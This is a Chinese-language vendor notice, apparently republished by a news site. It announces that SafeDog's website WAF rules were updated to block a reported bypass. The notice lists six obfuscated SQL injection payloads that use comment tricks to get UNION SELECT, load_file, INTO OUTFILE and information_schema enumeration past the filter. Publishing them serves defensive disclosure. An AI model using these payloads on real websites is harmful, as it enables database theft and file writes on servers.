网站安全狗规则更新:能力更强大,防护更安心

[摘要]近日有用户告知我们,网站安全狗在面对如下类型的攻击时,存在绕过的现象。 ?id=1e66union( *(x *–* )* select~1,database( *(ddddd
近日有用户告知我们,网站安全狗在面对如下类型的攻击时,存在绕过的现象。

?id=1e66union(/*(x/*–*\/)*/select~1,database(/*(ddddd/*\/)*/))

?id=1e66union(/*(x/*–*\/)*/select(id),host from myadmin limit 0,1)

?id=1111e66union(/*(x/*–*\/)*/select 1,load_file('d://false.txt)

?id=1111e66union(/*(x/*–*\/)*/select 1,2 intoxxxxoutfile'd://1.ss)

?id=1111e66union(/*(x/*–*\/)*/select 1,2 into/-*-yyyyyyyyy*\/)*outfile'd://1.ss)

?id=1111e66union(/*(q/*-q-q*q\/q)*/select@1,(column_namE)from(`iNformation_schema`/*!.*/`columns`)where(/* \/*/`table_name`)like(0x6

经过我们技术人员针对该问题进行规则更新后,默认规则可以实现拦截,望用户周知。

1527499119400505.png

安全狗作为云安全领域的知名品牌,一直以来为用户提供可靠专业的云安全服务,日均拦截超过近2亿次的攻击,是国内该领域广受用户认可的云安全服务平台。如果在使用过程中,您有任何意见或建议,请及时联系我们,为用户服务是我们不变的宗旨!




免责声明:

本站系本网编辑转载,会尽可能注明出处,但不排除无法注明来源的情况,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权和其它问题,请在30日内与本网联系, 来信: liujun@soft6.com 我们将在收到邮件后第一时间删除内容!

[声明]本站文章版权归原作者所有,内容为作者个人观点,不代表本网站的观点和对其真实性负责,本站拥有对此声明的最终解释权。